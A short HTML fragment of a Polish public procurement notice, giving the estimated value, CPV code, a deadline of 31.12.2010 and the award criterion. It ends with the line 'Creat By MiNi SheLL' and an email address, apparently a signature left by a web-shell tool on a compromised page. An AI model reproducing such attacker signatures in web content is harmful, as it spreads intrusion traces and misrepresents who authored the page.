Szacunkowa wartość zamówienia (bez VAT): 4 955,40 zł..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.10.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com